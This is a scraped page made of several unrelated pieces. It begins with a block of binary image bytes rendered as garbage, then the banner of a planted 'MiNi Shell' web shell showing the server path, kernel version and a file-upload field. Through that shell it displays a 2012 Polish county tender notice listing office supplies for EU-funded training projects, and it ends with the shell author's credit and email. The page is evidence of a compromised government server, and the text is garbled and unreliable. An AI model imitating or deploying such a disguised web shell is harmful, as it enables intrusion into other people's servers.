JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120830/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120830/186815-N-2012.html

<p class="kh_header"><b>Opoczno: Zakup i dostawa materiałów biurowych i eksploatacyjnych               
do projektów Wysokie kwalifikacje zawodowe - szansą na atrakcyjną pracę 2 Rozwój kompetencji - drogą do Przyszłości. Realizacja kursów Microsoft i Cisco oraz zajęć dydaktyczno - wyrównawczych
Nowoczesna szkoła - kluczem do sukcesu. Realizacja kursów 
Linux oraz zajęć dydaktyczno - wyrównawczych</b><br>
<b>Numer ogłoszenia: 186815 - 2012; data zamieszczenia: 30.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Opoczyński reprezentowany przez Zarząd Powiatu Opoczno , ul. Kwiatowa 1a, 26-300 Opoczno, woj. łódzkie, tel. 044 7361500, faks 044 7361500.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.opocznopowiat.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup i dostawa materiałów biurowych i eksploatacyjnych               
do projektów Wysokie kwalifikacje zawodowe - szansą na atrakcyjną pracę 2 Rozwój kompetencji - drogą do Przyszłości. Realizacja kursów Microsoft i Cisco oraz zajęć dydaktyczno - wyrównawczych
Nowoczesna szkoła - kluczem do sukcesu. Realizacja kursów 
Linux oraz zajęć dydaktyczno - wyrównawczych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup i dostawa materiałów biurowych i eksploatacyjnych do projektów współfinansowanych ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, zgodnie z poniższym opisem szczegółowym.

	CZĘŚĆ I: Wysokie kwalifikacje zawodowe - szansą na atrakcyjną pracę 2

	Przedmiotem zamówienia jest zakup i dostawa materiałów biurowych i eksploatacyjnych do projektu: Wysokie kwalifikacje zawodowe - szansą na atrakcyjną pracę 2, współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego, w ramach Programu Operacyjnego Kapitał Ludzki.

Lp.	NAZWA TOWARU	j. m.	ILOŚĆ RAZEM
1.	Papier ksero biały A4 80 g / m2	ryza	64
2.	Papier ksero mixkolor A4 80 g / m2	ryza	11
3.	Etykiety samoprzylepne A4	sztuka	200
4.	Zeszyt A4 twarda oprawa / kratka / 96 k	sztuka	102
5.	Zestaw druków akcydensowych:
- księga przych. i rozch. A5
- ewidencja nabycia tow. i usług VAT A5
- ewidencja sprzedaży VAT A5
- ewidencja przychodów A5
- faktura VAT A5
- faktura VAT korekta A5
- dowód wewnętrzny A6	
sztuka
sztuka
sztuka
sztuka
bloczek
bloczek
bloczek	
100
100
100
100
100
100
100
6.	Koperta A5 biała 	sztuka	100
7.	Koperta A4 biała	sztuka	100
8.	Karteczki samoprzylepne 75 x 75 mm 100 k	bloczek	12
9.	Zakładki Indeksujące samoprzylepne proste 45 x 12 mm /8 kolorów x 25 szt./	zestaw	5
10.	Półka na dokumenty podłużna A4 bezbarwna (ciężka)	sztuka	10
11.	Segregator A4/75  niebieski lub granatowy	sztuka	52
12.	Segregator A4/5  niebieski lub granatowy	sztuka	32
13.	Skoroszyt wpinany twardy PCV A4	sztuka	500
14.	Teczka skrzydłowa na rzep 40 mm A4 twarda, sztywna tektura	sztuka	100
15.	Teczka z gumką A4 karton w 3 kolorach	sztuka	152
16.	Folia do laminacji 80 micron  A4 /216 x 303 mm/	sztuka 	100
17.	Ofertówka krystaliczna A4	sztuka	50
18.	Koszulka groszkowa A4	sztuka	4220
19.	Okładka przezroczysta do bindowania A4	sztuka	200
20.	Okładka kartonowa kolorowa do bindowania A4	sztuka	200
21.	Długopis automatyczny dwukolorowy 	sztuka	102
22.	Ołówek automatyczny z gumką	sztuka	10
23.	Zakreślacz do papieru (druk, kopia, fax) różne kolory - dwustronny e - line 2	sztuka	114
24.	Markery do białych tablic z wymiennymi wkładami + gąbka magnetyczna	zestaw	5
25.	Flamastry - 12 kolorów	komplet	2
26.	Gumka do ścierania w sztyfcie	sztuka	8
27.	Dziurkacz duży metalowy /50 k/	sztuka	4
28.	Zszywacz długoramienny	sztuka	2
29.	Zszywacz /2-100 k/	sztuka	2
30.	Kalkulator - całki oznaczone i wartość pochodnej w punkcie, operacja na macierzach, liczby zespolone, zaawansowana statystyka i regresja, binarny, ósemkowy i szesnastkowy system liczbowy, operacja na wektorach, rozwiązywanie równań i układów równań, pamięć obliczeń, obliczanie wartości wyrażeń, suma wyrazów ciągu, funkcje trygonometryczne i hiperboliczne, wartość bezwzględna, tabela funkcji, kombinacje i permutacje, ułamki zwykłe.	sztuka	2
31.	Pendrive 16 GB	sztuka	2
32.	Nożyczki biurowe 17 cm	sztuka	8
33.	Linijka 30 cm	sztuka	2
34.	Ekierka 45/45	sztuka	2
35.	Cyrkiel metalowy z rysikiem	sztuka	2
36.	Klipsy biurowe 25 mm (12 szt. w opak.)	opak.	2
37.	Klipsy biurowe 19 mm (12 szt. w opak.)	opak.	2
38.	Spinacze biurowe 50 mm	opakowanie = 100	1
39.	Zszywki do zszywacza długoramiennego	Opak. = 1000 szt.	2
40.	Zszywki do zszywacza  /2-100 k/	Opak. = 1000 szt.	2
41.	Tusz do stempli czarny 	sztuka	1
42.	Tusz do drukarki HP 930C (19ml) kolor	sztuka	1
43.	Toner do drukarki laserowej Lexmark E260 (na 3500 s.)	sztuka	3
44.	Toner do urządzenia wielofunkcyjnego OKI MB470 (na 3500 s.)	sztuka	7
45.	Toner do drukarki laserowej Xerox 3010 Phaser (wysokowydajny)	sztuka	2
46.	Tusz do drukarki HP Photo Smart C 3100 czarny (11ml)
1 kolorowy (7ml)	sztuka	2
47.	Tusz do drukarki Xerox WorkCentre 3119 (na 3000 stron)	sztuka	1
48.	Toner do drukarki Brother DCP 7065 (na 2 600 stron)	sztuka	1

CZĘŚĆ II: Rozwój kompetencji - drogą do Przyszłości. Realizacja kursów Microsoft i Cisco oraz zajęć dydaktyczno - wyrównawczych

	Przedmiotem zamówienia jest zakup i dostawa materiałów biurowych i eksploatacyjnych do projektu Rozwój kompetencji - drogą do Przyszłości. Realizacja kursów Microsoft i Cisco oraz zajęć dydaktyczno - wyrównawczych współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki. 

LP.	NAZWA TOWARU	ILOŚĆ
1	Papier ksero A4/80g/m2  	2 ryzy
2	Skoroszyt A4 z zawieszką kolor - 10 szt.	2 opakowania
 
3	Koszulki A4/100 - groszkowe -100 szt.	2 opakowania

4	Tusz do drukarki HP Deskjet 5940 
(czarny, 12 ml)	2 szt.

5	Tusz do drukarki HP Deskjet 5940
 (kolor, 7 ml.)	2 szt.


CZĘŚĆ III: Nowoczesna szkoła - kluczem do sukcesu. Realizacja kursów Linux oraz zajęć dydaktyczno - wyrównawczych
	Przedmiotem zamówienia jest zakup i dostawa materiałów biurowych i eksploatacyjnych do projektu Nowoczesna szkoła - kluczem do sukcesu . Realizacja kursów Linux oraz zajęć dydaktyczno - wyrównawczych współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki. 

LP.	NAZWA TOWARU	ILOŚĆ
1.	Papier ksero A4/80g/m2  	23 ryzy
2.	Skoroszyt A4 wpinany, twardy - 10 szt.	32 opak.
3.	Koszulka A4/100 - groszkowe	15 opak.
4.	Tusz do drukarki HP Deskjet 1220C
(czarny)	5 szt.
5.	Tusz do drukarki HP Deskjet 1220C
 (kolor)	5 szt.
6.	Zeszyt A4 twar. opraw. kratka/96 kart.	54 szt.
7.	Segregator A4/75 kolor 	40 szt.
8.	Teczka na gumkę A4 	54 szt.
9.	Długopis automatyczny	54 szt.
10.	Ołówek automatyczny	54 szt.
11.	Pendrive 8 GB	24 szt.
12.	Linijka 30 cm	30 szt.
13.	Cyrkiel metalowy z rysikiem	30 szt.
14.	Płyta CD	24 szt.
15.	Płyta DVD	24 szt..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.12.51.00-2, 30.12.51.10-5, 30.19.21.00-2, 30.19.21.13-6, 30.19.00.00-7, 30.19.20.00-1, 30.19.76.30-1, 30.19.92.30-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 10.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"></ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Informacje zawarte we wzorze umowy - wg załącznika nr 4 do SIWZ.
2.	Na podstawie art. 144 ust.1 ustawy Pzp. Zamawiający dopuszcza zmiany postanowień w zawartej umowie w stosunku do treści oferty w następujących przypadkach:
a.	nie można dotrzymać terminu wykonania zamówienia na skutek okoliczności, których nie można było przewidzieć pomimo zachowania należytej staranności;
b.	nastąpiła zmiana przepisów istotnych dla realizacji przedmiotu umowy;
c.	nastąpiło wydłużenie procedur administracyjnych niezależnych od Wykonawcy, które mają wpływ na termin wykonania przedmiotu umowy;
3. Warunkiem dokonania zmian, o których mowa w pkt. 2, jest złożenie pisemnego wniosku przez stronę inicjującą zmianę, zawierającego:
a)	opis zmiany,
b)	uzasadnienie zmiany.	
4.	Zmiana postanowień umowy może nastąpić wyłącznie za zgodą obu stron wyrażoną w formie pisemnego aneksu pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.opocznopowiat.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Opocznie, ul. Kwiatowa 1a, 26-300 Opoczno.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.09.2012 godzina 13:30, miejsce: Oferty należy składać w biurze podawczym w Starostwie Powiatowym, ul. Kwiatowa 1a, 26-300 Opoczno lub za pośrednictwem poczty..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedmiotem zamówienia jest zakup i dostawa materiałów biurowych i eksploatacyjnych do  projektów współfinansowanych ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego: CZĘŚĆ I: Wysokie kwalifikacje zawodowe - szansą na atrakcyjną pracę 2 CZĘŚĆ II: Rozwój kompetencji - drogą do Przyszłości. Realizacja kursów Microsoft i Cisco oraz zajęć dydaktyczno - wyrównawczych CZĘŚĆ III: Nowoczesna szkoła - kluczem do sukcesu. Realizacja kursów Linux oraz zajęć dydaktyczno - wyrównawczych..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com